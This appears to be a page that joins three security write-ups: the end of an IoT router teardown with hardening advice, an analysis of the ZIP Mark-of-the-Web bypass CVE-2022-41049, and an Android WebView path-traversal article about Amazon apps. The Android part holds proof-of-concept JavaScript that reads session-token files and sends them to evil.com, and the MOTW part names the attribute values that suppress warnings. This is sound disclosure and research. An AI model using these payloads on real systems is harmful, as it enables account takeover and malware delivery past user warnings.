After a few minutes, I was able to get the chip off. However, there is a tiny shielded inductor or resistor that was affected by the heat which shifted when I removed the SPI with the tweezers. I wasn’t able to get this component back on the board. Fuck. I’m not an EE so I don’t fully understand the impact and consequences this has.  

Let’s mount the SPI onto a SOP8 socket which we’ll then connect to our reprogrammer. Below is the orientation of the memory in the adapter.

This is, once again, quite a shitty reprogrammer. I actually had to disable driver signing to get the USB connection recognized after manually installing the shady driver. We’ll go ahead and configure our chip options knowing our SPI is Macronix MX25L12835F.

However, this also failed/couldn’t do any reads. I spend another ~5 hours debugging this. I thought it was the SOP socket clip so I soldered it onto a board and relayed the links to the reprogrammer but the results were the same.

After a while, I went ahead and re-soldered it to the main router PCB, and the device was fully bricked. To be quite honest, I’m not sure what I did wrong/at which step I made the mistake. 

They say that failure is another stepping stone to greatness, but given that the entire reason for this purchase was to try out some new hardware hacking methodologies…. this was very bittersweet. 

I remembered the squashfs information displayed in the UART log information. So, if we really wanted to reverse the firmware it’s still impossible. You can grab the unsigned firmware from the vendor’s site vendors here. Below are the steps you’d follow if you had successfully extracted the firmware to get to the filesystem.

So let’s check if they have any hardcoded credentials.

Luckily, they don’t.

The last thing I observed was that in the UBI reader there is an extra data block at the end of the image and somewhere in between that in theory could allow us to read code.

This purchase was supposed to be hardware hacking focused & I failed my personal objectives. To compensate I’ll share some closing thoughts with you. 

In case you were wondering «how can the vendor prevent basic IoT hardware vulnerabilities? And is it worth it?». The answer is yes, and yes. This blog is long enough so I’ll keep it short. 

Think of it this way. Having an extra layer of protection or some baseline obfuscation in the event that developers make mistakes is a good idea and something that should be planned for. The way I see it, if the JTAG, UART, or ICSP connector weren’t immediately apparent, this would’ve slowed me down and perhaps eventually demotivate me to push on. 

The beautiful part is that hardware obfuscation is easy to introduce at the earliest stages of product development. Unlike software controls, which are implemented at later stages of the project and left out due to lack of time. There exist many different hardware controls which are all relatively easy to implement. 

Since the hardware hacking portion of this blog wasn’t a great success I might as well share some thoughts & ideas on remediation & how to make IoT hardware more secure. 

1. Removing the PCB silkscreen. Marks, logos, symbols, etc, have to go. There’s no real reason to draw up the entire board, especially if it’s in production.

2. Hide the traces! It’s too simple to follow the solder mask (the light green parts on this PCB) What’s the point of making them so obvious?

3. Hardware-level tamper protection. It’s possible to set hardware and even software fuses to prevent readout (bear in mind that both can be bypassed in many cases).

4. Remove test pins and probe pads and other debugging connections. Realistically speaking if the product malfunctions and a firmware update won’t fix it, the manufacturer likely won’t send someone onsite to debug /fix it. 99% of the time they’re simply going to send you a new one. So why have debug interfaces enabled/on production devices?

5. If you’re using vias as test points (because they make using a multimeter or a scope probe much easier, and are typically used by embedded passive components) it would be wise to use buried or blind vias. The cost of adding additional PCB layers is cheap if you don’t already have enough to do this.

6. Remove all chipset markings! It’s seriously so much harder & time-consuming to identify a chip with no markings.

7. Why not use tamper-proof cases, sensors (photodiode detectors), or one-way screws. Again some of these are not difficult to drill bypass. However, you’re testing the motivation of the attacker. Only really motivated reverse engineers would bother opening devices in the dark.

If you’re interested, here are some solid publications regarding hardware obfuscation I’d recommend the following papers:

1. https://arxiv.org/pdf/1910.00981.pdf
2. https://swarup.ece.ufl.edu/papers/J/J48.pdf

Summary:

I hope you liked the blog post. Follow me on twitter I sometimes post interesting stuff there too. This was a lot of fun! Personally, I’d strongly recommend going on Amazon, Alibaba, or Aliexpress and buying a bunch of odd or common IoT devices and tearing them down. You never know what you will find 🙂

Thank you for reading!

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

Original text by breakdev

Windows ZIP extraction bug (CVE-2022-41049) lets attackers craft ZIP files, which evade warnings on attempts to execute packaged files, even if ZIP file was downloaded from the Internet.

In October 2022, I’ve come across a tweet from 5th July, from @wdormann, who reported a discovery of a new method for bypassing MOTW, using a flaw in how Windows handles file extraction from ZIP files.

Will Dormann
@wdormann
The ISO in question here takes advantage of several default behaviors: 1) MotW doesn’t get applied to ISO contents 2) Hidden files aren’t displayed 3) .LNK file extensions are always hidden, regardless of the Explorer preference to hide known file extensions.

So if it were a ZIP instead of ISO, would MotW be fine? Not really. Even though Windows tries to apply MotW to extracted ZIP contents, it’s really quite bad at it. Without trying too hard, here I’ve got a ZIP file where the contents retain NO protection from Mark of the Web.

https://twitter.com/wdormann/status/1544416883419619333

This sounded to me like a nice challenge to freshen up my rusty RE skills. The bug was also a 0-day, at the time. It has already been reported to Microsoft, without a fix deployed for more than 90 days.

What I always find the most interesting about vulnerability research write-ups is the process on how one found the bug, what tools were used and what approach was taken. I wanted this post to be like this.

Now that the vulnerability has been fixed, I can freely publish the details.

Background

What I found out, based on public information about the bug and demo videos, was that Windows, somehow, does not append MOTW to files extracted from ZIP files.

Mark-of-the-web is really another file attached as an Alternate Data Stream (ADS), named 

Zone.Identifier
, and it is only available on NTFS filesystems. The ADS file always contains the same content:

[ZoneTransfer]
ZoneId=3

For example, when you download a ZIP file 

file.zip
, from the Internet, the browser will automatically add 
file.zip:Zone.Identifier
 ADS to it, with the above contents, to indicate that the file has been downloaded from the Internet and that Windows needs to warn the user of any risks involving this file’s execution.

This is what happens when you try to execute an executable like a JScript file, through double-clicking, stored in a ZIP file, with MOTW attached.

Clearly the user would think twice before opening it when such popup shows up. This is not the case, though, for specially crafted ZIP files bypassing that feature.

Let’s find the cause of the bug.

Identifying the culprit

What I knew already from my observation is that the bug was triggered when 

explorer.exe
 process handles the extraction of ZIP files. I figured the process must be using some internal Windows library for handling ZIP files unpacking and I was not mistaken.

ProcessHacker revealed 

zipfldr.dll
 module loaded within Explorer process and it looked like a good starting point. I booted up IDA with conveniently provided symbols from Microsoft, to look around.

ExtractFromZipToFile
 function immediately caught my attention. I created a sample ZIP file with a packaged JScript file, for testing, which had a single instruction:

WScript.Echo("YOU GOT HACKED!!1");

I then added a MOTW ADS file with Notepad and filled it with MOTW contents, mentioned above:

notepad file.zip:Zone.Identifier

I loaded up 

x64dbg
 debugger, attached it to 
explorer.exe
 and set up a breakpoint on 
ExtractFromZipToFile
. When I double-clicked the JS file, the breakpoint triggered and I could confirm I’m on the right path.

CheckUnZippedFile

One of the function calls I noticed nearby, revealed an interesting pattern in IDA. Right after the file is extracted and specific conditions are meet, 

CheckUnZippedFile
 function is called, followed by a call to 
_OpenExplorerTempFile
, which opens the extracted file.

Having a hunch that 

CheckUnZippedFile
 is the function responsible for adding MOTW to extracted file, I nopped its call and found that I stopped getting the MOTW warning popup, when I tried executing a JScript file from within the ZIP.

It was clear to me that if I managed to manipulate the execution flow in such a way that the branch, executing this function is skipped, I will be able to achieve the desired effect of bypassing the creation of MOTW on extracted files. I looked into the function to investigate further.

I noticed that 

CheckUnZippedFile
 tries to combine the TEMP folder path with the zipped file filename, extracted from the ZIP file, and when this function fails, the function quits, skipping the creation of MOTW file.

Considering that I controlled the filename of the extracted ZIP file, I could possibly manipulate its content to trigger 

PathCombineW
 to fail and as a result achieve my goal.

PathCombineW
 turned out to be a wrapper around 
PathCchCombineExW
 function with output buffer size limit set to fixed value of 
260
 bytes. I thought that if I managed to create a really long filename or use some special characters, which would be ignored by the function handling the file extraction, but would trigger the length check in 
CheckUnZippedFile
 to fail, it could work.

I opened 010 Editor, which I highly recommend for any kind of hex editing work, and opened my sample ZIP file with a built-in ZIP template.

I spent few hours testing with different filename lengths, with different special characters, just to see if the extraction function would behave in erratic way. Unfortunately I found out that there was another path length check, called prior to the one I’ve been investigating. It triggered much earlier and prevented me from exploiting this one specific check. I had to start over and consider this path a dead end.

I looked if there are any controllable branching conditions, that would result in not triggering the call to 

CheckUnZippedFile
 at all, but none of them seemed to be dependent on any of the internal ZIP file parameters. I considered looking deeper into 
CheckUnZippedFile
 function and found out that when 
PathCombineW
 call succeeds, it creates a 
CAttachmentServices
 COM objects, which has its three methods called:

CAttachmentServices::SetReferrer(unsigned short const * __ptr64)
CAttachmentServices::SetSource(unsigned short const * __ptr64)
CAttachmentServices::SaveWithUI(struct HWND__ * __ptr64)

 realized I am about to go deep down a rabbit hole and I may spend there much longer than a hobby project like that should require. I had to get a public exploit sample to speed things up.

Huge thanks you @bohops & @bufalloveflow for all the help in getting the sample!

Detonating the live sample

I managed to copy over all relevant ZIP file parameters from the obtained exploit sample into my test sample and I confirmed that MOTW was gone, when I extracted the sample JScript file.

I decided to dig deeper into 

SaveWithUI
 COM method to find the exact place where creation of 
Zone.Identifier
 ADS fails. Navigating through 
shdocvw.dll
, I ended up in 
urlmon.dll
 with a failing call to 
<a href="https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-writeprivateprofilestringw">WritePrivateProfileStringW</a>
.

This is the Windows API function for handling the creation of INI configuration files. Considering that 

Zone.Identifier
 ADS file is an INI file containing section 
ZoneTransfer
, it was definitely relevant. I dug deeper.

The search led me to the final call of 

<a href="https://learn.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntcreatefile">NtCreateFile</a>
, trying to create the 
Zone.Identifier
 ADS file, which failed with 
ACCESS_DENIED
 error, when using the exploit sample and succeeded when using the original, untampered test sample.

It looked like the majority of parameters were constant, as you can see on the screenshot above. The only place where I’d expect anything dynamic was in the structure of 

ObjectAttributes
 parameter. After closer inspection and half an hour of closely comparing the contents of the parameter structures from two calls, I concluded that both failing and succeeding calls use exactly the same parameters.

This led me to realize that something had to be happening prior to the creation of the ADS file, which I did not account for. There was no better way to figure that out than to use Process Monitor, which honestly I should’ve used long before I even opened IDA 😛.

Backtracking

I set up my filters to only list file operations related to files extracted to TEMP directory, starting with 

Temp
 prefix.

The test sample clearly succeeded in creating the 

Zone.Identifier
 ADS file:

While the exploit sample failed:

Through comparison of these two listings, I could not clearly see any drastic differences. I exported the results as text files and compared them in a text editor. That’s when I could finally spot it.

Prior to creating 

Zone.Identifier
 ADS file, the call to 
SetBasicInformationFile
 was made with 
FileAttributes
 set to 
RN
.

I looked up what was that 

R
 attribute, which apparently is not set for the file when extracting from the original test sample and then…

Facepalm

The 

R
 file attribute stands for 
read-only
. The file stored in a ZIP file has the read-only attribute set, which is set also on the file extracted from the ZIP. Obviously when Windows tries to attach the 
Zone.Identifier
 ADS, to it, it fails, because the file has a read-only attribute and any write operation on it will fail with 
ACCESS_DENIED
 error.

It doesn’t even seem to be a bug, since everything is working as expected 😛. The file attributes in a ZIP file are set in 

ExternalAttributes
 parameter of the 
ZIPDIRENTRY
 structure and its value corresponds to the ones, which carried over from MS-DOS times, as stated in ZIP file format documentation I found online.

4.4.15 external file attributes: (4 bytes)

       The mapping of the external attributes is
       host-system dependent (see 'version made by').  For
       MS-DOS, the low order byte is the MS-DOS directory
       attribute byte.  If input came from standard input, this
       field is set to zero.

   4.4.2 version made by (2 bytes)

        4.4.2.1 The upper byte indicates the compatibility of the file
        attribute information.  If the external file attributes 
        are compatible with MS-DOS and can be read by PKZIP for 
        DOS version 2.04g then this value will be zero.  If these 
        attributes are not compatible, then this value will 
        identify the host system on which the attributes are 
        compatible.  Software can use this information to determine
        the line record format for text files etc.  

        4.4.2.2 The current mappings are:

         0 - MS-DOS and OS/2 (FAT / VFAT / FAT32 file systems)
         1 - Amiga                     2 - OpenVMS
         3 - UNIX                      4 - VM/CMS
         5 - Atari ST                  6 - OS/2 H.P.F.S.
         7 - Macintosh                 8 - Z-System
         9 - CP/M                     10 - Windows NTFS
        11 - MVS (OS/390 - Z/OS)      12 - VSE
        13 - Acorn Risc               14 - VFAT
        15 - alternate MVS            16 - BeOS
        17 - Tandem                   18 - OS/400
        19 - OS X (Darwin)            20 thru 255 - unused

        4.4.2.3 The lower byte indicates the ZIP specification version 
        (the version of this document) supported by the software 
        used to encode the file.  The value/10 indicates the major 
        version number, and the value mod 10 is the minor version 
        number.  

Changing the value of external attributes to anything with the lowest bit set e.g. 

0x21
 or 
0x01
, would effectively make the file read-only with Windows being unable to create MOTW for it, after extraction.

Conclusion

I honestly expected the bug to be much more complicated and I definitely shot myself in the foot, getting too excited to start up IDA, instead of running Process Monitor first. I started with IDA first as I didn’t have an exploit sample in the beginning and I was hoping to find the bug, through code analysis. Bottom line, I managed to learn something new about Windows internals and how extraction of ZIP files is handled.

As a bonus, Mitja Kolsek from 0patch asked me to confirm if their patch worked and I was happy to confirm that it did!

https://twitter.com/mrgretzky/status/1587234508998418434

The patch was clean and reliable as seen in the screenshot from a debugger:

I’ve been also able to have a nice chat with Will Dormann, who initially discovered this bug, and his story on how he found it is hilarious:

I merely wanted to demonstrate how an exploit in a ZIP was safer (by way of prompting the user) than that *same* exploit in an ISO.  So how did I make the ZIP?  I:
1) Dragged the files out of the mounted ISO
2) Zipped them. That's it.  The ZIP contents behaved the same as the ISO.

Every mounted ISO image is listing all files in read-only mode. Drag & dropping files from read-only partition, to a different one, preserves the read-only attribute set for created files. This is how Will managed to unknowingly trigger the bug.

Will also made me realize that 7zip extractor, even though having announced they began to add MOTW to every file extracted from MOTW marked archive, does not add MOTW by default and this feature has to be enabled manually.

I mentioned it as it may explain why MOTW is not always considered a valid security boundary. Vulnerabilities related to it may be given low priority and be even ignored by Microsoft for 90 days.

When 7zip announced support for MOTW in June, I honestly took for granted that it would be enabled by default, but apparently the developer doesn’t know exactly what he is doing.

I haven’t yet analyzed how the patch made by Microsoft works, but do let me know if you did and I will gladly update this post with additional information.

Hope you enjoyed the write-up!

Android: Exploring vulnerabilities in WebResourceResponse

Android: Exploring vulnerabilities in WebResourceResponse

Original text by oversecured

When it comes to vulnerabilities in WebViews, we often overlook the incorrect implementation of 

WebResourceResponse
 which is a WebView class that allows an Android app to emulate the server by returning a response (including a status code, content type, content encoding, headers and the response body) from the app’s code itself without making any actual requests to the server. At the end of the article, we’ll show how we exploited a vulnerability related to this in Amazon apps.

Do you want to check your mobile apps for such types of vulnerabilities? Oversecured mobile apps scanner provides an automatic solution that helps to detect vulnerabilities in Android and iOS mobile apps. You can integrate Oversecured into your development process and check every new line of your code to ensure your users are always protected.

Start securing your apps by starting a free 2-week trial from Quick Start, or you can book a call with our team or contact us to explore more.

What is 

WebResourceResponse
?

The WebView class in Android is used for displaying web content within an app, and provides extensive capabilities for manipulating requests and responses. It is a fancy web browser that allows developers, among other things, to bypass standard browser security. Any misuse of these features by a malicious actor can lead to vulnerabilities in mobile apps.

One of these features is that a WebView allows you to intercept app requests and return arbitrary content, which is implemented via the 

WebResourceResponse
 class.

Let’s look at a typical example of a 

WebResourceResponse
 implementation:

WebView webView = findViewById(R.id.webView);
webView.setWebViewClient(new WebViewClient() {
   public WebResourceResponse shouldInterceptRequest(WebView view, WebResourceRequest request) {
       Uri uri = request.getUrl();
       if (uri.getPath().startsWith("/local_cache/")) {
           File cacheFile = new File(getCacheDir(), uri.getLastPathSegment());
           if (cacheFile.exists()) {
               InputStream inputStream;
               try {
                   inputStream = new FileInputStream(cacheFile);
               } catch (IOException e) {
                   return null;
               }
               Map<String, String> headers = new HashMap<>();
               headers.put("Access-Control-Allow-Origin", "*");
               return new WebResourceResponse("text/html", "utf-8", 200, "OK", headers, inputStream);
           }
       }
       return super.shouldInterceptRequest(view, request);
   }
});

As you can see in the code above, if the request URI matches a given pattern, then the response is returned from the app resources or local files. The problem arises when an attacker can manipulate the path of the returned file and, through XHR requests, gain access to arbitrary files.

Therefore, if an attacker discovers a simple XSS or the ability to open arbitrary links inside the Android app, they can use that to leak sensitive user data – which can also include the access token, leading to a full account takeover.

Proof of Concept for an attack

If you already have the ability to execute arbitrary JavaScript code inside a vulnerable WebView, and assuming there is some sensitive data in 

/data/data/com.victim/shared_prefs/auth.xml
, then the Proof of Concept for the attack will look like this:

<!DOCTYPE html>
<html>
<head>
   <title>Evil page</title>
</head>
<body>
<script type="text/javascript">
   function theftFile(path, callback) {
     var oReq = new XMLHttpRequest();

     oReq.open("GET", "https://any.domain/local_cache/..%2F" + encodeURIComponent(path), true);
     oReq.onload = function(e) {
       callback(oReq.responseText);
     }
     oReq.onerror = function(e) {
       callback(null);
     }
     oReq.send();
   }

   theftFile("shared_prefs/auth.xml", function(contents) {
       location.href = "https://evil.com/?data=" + encodeURIComponent(contents);
   });
</script>
</body>
</html>

It should be noted that the attack works because 

new File(getCacheDir(), uri.getLastPathSegment())
 is being used to generate the path and the method 
Uri.getLastPathSegment()
 returns a decoded value.

However, policies like CORS still work inside a WebView. Therefore, if 

Access-Control-Allow-Origin: *
 is not specified in the headers, then requests to the current domain will not be allowed. In our example, this restriction will not affect the exploitation of path traversal, because 
any.domain
 can be replaced with the current scheme + host + port.

An overview of the vulnerability in Amazon’s apps

We scanned the Amazon Shopping and Amazon India Online Shopping apps and found two vulnerabilities. They were chained to access arbitrary files owned by Amazon apps and then reported to the Amazon VRP on December 21st, 2019. The issues were confirmed fixed by Amazon on April 6th, 2020.

  • The first was opening arbitrary URLs within the WebView through the 
    com.amazon.mShop.pushnotification.WebNotificationsSettingsActivity
    activity:

– and the second was stealing arbitrary files via 

WebResourceResponse
 in the 
com/amazon/mobile/mash/MASHWebViewClient.java
 file:

Two checks take place in the 

com/amazon/mobile/mash/handlers/LocalAssetHandler.java
 file:

One is in the 

shouldHandlePackage
 method:

public boolean shouldHandlePackage(UrlWebviewPackage pkg) {
       return pkg.getUrl().startsWith("https://app.local/");
   }

And the second is in the 

handlePackage
 handler:

public WebResourceResponse handlePackage(UrlWebviewPackage pkg) {
       InputStream stm;
       Uri uri = Uri.parse(pkg.getUrl());
       String path = uri.getPath().substring(1);
       try {
           if (path.startsWith("assets/")) {
               stm = pkg.getWebView().getContext().getResources().getAssets().open(path.substring("assets/".length()));
           } else if (path.startsWith("files/")) {
               stm = new FileInputStream(path.substring("files/".length())); // path to an arbitrary file
           } else {
               MASHLog.m2345v(TAG, "Unexpected path " + path);
               stm = null;
           }
           //...
           Map<String, String> headers = new HashMap<>();
           headers.put("Cache-Control", "max-age=31556926");
           headers.put("Access-Control-Allow-Origin", "*");
           return new WebResourceResponse(mimeType, null, 200, "OK", headers, stm);
       } catch (IOException e) {
           MASHLog.m2346v(TAG, "Failed to load resource " + uri, e);
           return null;
       }
   }


Proof of Concept for Amazon

Keeping the above-mentioned vulnerabilities and checks in mind, the attacker’s app looked like this:

String file = "/sdcard/evil.html";
   try {
       InputStream i = getAssets().open("evil.html");
       OutputStream o = new FileOutputStream(file);
       IOUtils.copy(i, o);
       i.close();
       o.close();
   } catch (Exception e) {
       throw new RuntimeException(e);
   }

   Intent intent = new Intent();
   intent.setClassName("in.amazon.mShop.android.shopping", "com.amazon.mShop.pushnotification.WebNotificationsSettingsActivity");
   intent.putExtra("MASHWEBVIEW_URL", "file://www.amazon.in" + file + "#/data/data/in.amazon.mShop.android.shopping/shared_prefs/DataStore.xml");
   startActivity(intent);

The apps also had a host check that was bypassed by us. This check could also be bypassed using the 

javascript:
 scheme which removed any requirements to have SD card permissions for making a file.

The file 

evil.html
 contained the exploit code:

<!DOCTYPE html>
<html>
<head>
   <title>Evil</title>
</head>
<body>
<script type="text/javascript">
   function theftFile(path, callback) {
     var oReq = new XMLHttpRequest();

     oReq.open("GET", "https://app.local/files/" + path, true);
     oReq.onload = function(e) {
       callback(oReq.responseText);
     }
     oReq.onerror = function(e) {
       callback(null);
     }
     oReq.send();
   }

   theftFile(location.hash.substring(1), function(contents) {
       location.href = "https://evil.com/?data=" + encodeURIComponent(contents);
   });
</script>
</body>
</html>

As a result, on opening the attacker’s app, the 

DataStore.xml
 file containing the user’s session token was sent to the attacker’s server.

How to prevent this vulnerability

While implementing 

WebResourceResponse
, it is recommended to use 
WebViewAssetLoader
, which is a user-friendly interface. It allows the app to safely process data from resources, assets or a predefined directory.

It could be challenging to keep track of security, especially in large projects. You can use Oversecured vulnerability scanner since it tracks all known security issues on Android and iOS including all the vectors mentioned above. To begin testing your apps, use Quick Startbook a call or contact us.